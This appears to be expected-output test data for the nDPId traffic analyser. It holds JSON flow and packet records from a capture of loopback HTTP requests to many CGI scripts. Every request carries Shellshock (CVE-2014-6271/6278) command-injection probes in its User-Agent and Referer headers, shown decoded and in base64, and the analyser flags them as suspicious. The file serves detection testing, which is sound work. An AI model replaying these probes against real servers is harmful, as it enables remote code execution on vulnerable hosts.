00768{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":450,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_packet_id":1,"flow_last_seen":1576420277399,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":280,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":280,"pkt_l4_len":246,"thread_ts_msec":1576420277399,"pkt":"AAAAAAAAAAAAAAAACABFAAEK9YVAAEAGRmZ\/AAABfwAAAcUeH5Br181GQEYmBIAYAED+\/gAAAQEICp1m\/b+dZv2\/R0VUIC9jb3VudC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="}
01162{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":450,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":450,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277399,"flow_last_seen":1576420277399,"flow_idle_time":7580000,"flow_min_l4_payload_len":214,"flow_max_l4_payload_len":214,"flow_tot_l4_payload_len":214,"midstream":1,"thread_ts_msec":1576420277399,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50462,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/count.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277401,"flow_last_seen":1576420277401,"flow_idle_time":7580000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277401,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50464,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_packet_id":1,"flow_last_seen":1576420277401,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1576420277401,"pkt":"AAAAAAAAAAAAAAAACABFAAETxAhAAEAGd9p\/AAABfwAAAcUgH5CMzvzBXE4TboAYAED\/BwAAAQEICp1m\/cGdZv3BR0VUIC9kZWZhdWx0d2VicGFnZS5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01171{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":451,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":451,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277401,"flow_last_seen":1576420277401,"flow_idle_time":7580000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277401,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50464,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/defaultwebpage.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":452,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277402,"flow_last_seen":1576420277402,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277402,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50466,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00772{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":452,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_packet_id":1,"flow_last_seen":1576420277402,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277402,"pkt":"AAAAAAAAAAAAAAAACABFAAENn\/9AAEAGm+l\/AAABfwAAAcUiH5Cfgqc8sQq4SIAYAED\/AQAAAQEICp1m\/cKdZv3CR0VUIC9kb3dubG9hZC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpSZWZlcmVyOiAoKSB7IF87IH0gPl9bJCgkKCkpXSB7IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzg6IHRydWU7IGVjaG87ZWNobzsgfQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":452,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":452,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277402,"flow_last_seen":1576420277402,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277402,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50466,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/download.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":453,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277403,"flow_last_seen":1576420277403,"flow_idle_time":7580000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277403,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50468,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":453,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_packet_id":1,"flow_last_seen":1576420277403,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":288,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":288,"pkt_l4_len":254,"thread_ts_msec":1576420277403,"pkt":"AAAAAAAAAAAAAAAACABFAAESp5VAAEAGlE5\/AAABfwAAAcUkH5At0J9VXKwRhYAYAED\/BgAAAQEICp1m\/cOdZv3DR0VUIC9lbnRyb3B5c2VhcmNoLmNnaSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogKCkgeyA6OyB9OyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02MjcxOiB0cnVlO2VjaG87ZWNobzsNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCg0K"}
01170{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":453,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":453,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277403,"flow_last_seen":1576420277403,"flow_idle_time":7580000,"flow_min_l4_payload_len":222,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"midstream":1,"thread_ts_msec":1576420277403,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50468,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/entropysearch.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":454,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277405,"flow_last_seen":1576420277405,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277405,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50470,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00763{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":454,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_packet_id":1,"flow_last_seen":1576420277405,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":278,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":278,"pkt_l4_len":244,"thread_ts_msec":1576420277405,"pkt":"AAAAAAAAAAAAAAAACABFAAEI2lVAAEAGYZh\/AAABfwAAAcUmH5ARUOKViVHVaYAYAED+\/AAAAQEICp1m\/cSdZv3ER0VUIC9lbnYuY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01160{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":454,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":454,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277405,"flow_last_seen":1576420277405,"flow_idle_time":7580000,"flow_min_l4_payload_len":212,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"midstream":1,"thread_ts_msec":1576420277405,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50470,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/env.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":455,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277406,"flow_last_seen":1576420277406,"flow_idle_time":7580000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":220,"flow_tot_l4_payload_len":220,"midstream":1,"thread_ts_msec":1576420277406,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50472,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00775{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_packet_id":1,"flow_last_seen":1576420277406,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":286,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":286,"pkt_l4_len":252,"thread_ts_msec":1576420277406,"pkt":"AAAAAAAAAAAAAAAACABFAAEQ2p9AAEAGYUZ\/AAABfwAAAcUoH5D43eJbIwWC0IAYAED\/BAAAAQEICp1m\/cadZv3GR0VUIC9lbnZpcm9ubWVudC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="}
01168{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":455,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":455,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277406,"flow_last_seen":1576420277406,"flow_idle_time":7580000,"flow_min_l4_payload_len":220,"flow_max_l4_payload_len":220,"flow_tot_l4_payload_len":220,"midstream":1,"thread_ts_msec":1576420277406,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50472,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/environment.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":456,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277407,"flow_last_seen":1576420277407,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277407,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50474,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_packet_id":1,"flow_last_seen":1576420277407,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277407,"pkt":"AAAAAAAAAAAAAAAACABFAAENbStAAEAGzr1\/AAABfwAAAcUqH5C5flXvg270eYAYAED\/AQAAAQEICp1m\/cedZv3HR0VUIC9lem1sbS1icm93c2UgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KUmVmZXJlcjogKCkgeyBfOyB9ID5fWyQoJCgpKV0geyBlY2hvIDkzZTRyMC1DVkUtMjAxNC02Mjc4OiB0cnVlOyBlY2hvO2VjaG87IH0NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQoNCg=="}
01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":456,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277407,"flow_last_seen":1576420277407,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277407,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50474,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ezmlm-browse","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":457,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277409,"flow_last_seen":1576420277409,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277409,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50476,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":457,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_packet_id":1,"flow_last_seen":1576420277409,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":283,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":283,"pkt_l4_len":249,"thread_ts_msec":1576420277409,"pkt":"AAAAAAAAAAAAAAAACABFAAENkcFAAEAGqid\/AAABfwAAAcUsH5BKNKl4Ee+JJYAYAED\/AQAAAQEICp1m\/cmdZv3JR0VUIC9mb3JtbWFpbC5jZ2kgSFRUUC8xLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQoNCg=="}
01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":457,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":457,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277409,"flow_last_seen":1576420277409,"flow_idle_time":7580000,"flow_min_l4_payload_len":217,"flow_max_l4_payload_len":217,"flow_tot_l4_payload_len":217,"midstream":1,"thread_ts_msec":1576420277409,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50476,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/formmail.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":458,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277410,"flow_last_seen":1576420277410,"flow_idle_time":7580000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277410,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50478,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00779{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":458,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_packet_id":1,"flow_last_seen":1576420277410,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":289,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":289,"pkt_l4_len":255,"thread_ts_msec":1576420277410,"pkt":"AAAAAAAAAAAAAAAACABFAAEToPJAAEAGmvB\/AAABfwAAAcUuH5CLPJg5VfIqUIAYAED\/BwAAAQEICp1m\/cqdZv3KR0VUIC9Gb3JtTWFpbC1jbG9uZS5jZ2kgSFRUUC8xLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6ICgpIHsgOjsgfTsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3MTogdHJ1ZTtlY2hvO2VjaG87DQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="}
01171{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":458,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":458,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277410,"flow_last_seen":1576420277410,"flow_idle_time":7580000,"flow_min_l4_payload_len":223,"flow_max_l4_payload_len":223,"flow_tot_l4_payload_len":223,"midstream":1,"thread_ts_msec":1576420277410,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50478,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/FormMail-clone.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":459,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277412,"flow_last_seen":1576420277412,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277412,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50480,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00771{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_packet_id":1,"flow_last_seen":1576420277412,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":284,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":284,"pkt_l4_len":250,"thread_ts_msec":1576420277412,"pkt":"AAAAAAAAAAAAAAAACABFAAEOAyBAAEAGOMh\/AAABfwAAAcUwH5BOyzvYEAppQYAYAED\/AgAAAQEICp1m\/cydZv3MR0VUIC9ndWVzdGJvb2suY2dpIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClJlZmVyZXI6ICgpIHsgXzsgfSA+X1skKCQoKSldIHsgZWNobyA5M2U0cjAtQ1ZFLTIwMTQtNjI3ODogdHJ1ZTsgZWNobztlY2hvOyB9DQpVc2VyLUFnZW50OiAoKSB7IDo7IH07IGVjaG8gOTNlNHIwLUNWRS0yMDE0LTYyNzE6IHRydWU7ZWNobztlY2hvOw0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01166{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":459,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":459,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277412,"flow_last_seen":1576420277412,"flow_idle_time":7580000,"flow_min_l4_payload_len":218,"flow_max_l4_payload_len":218,"flow_tot_l4_payload_len":218,"midstream":1,"thread_ts_msec":1576420277412,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50480,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/guestbook.cgi","code":0,"content_type":"","user_agent":"() { :; }; echo 93e4r0-CVE-2014-6271: true;echo;echo;"}}
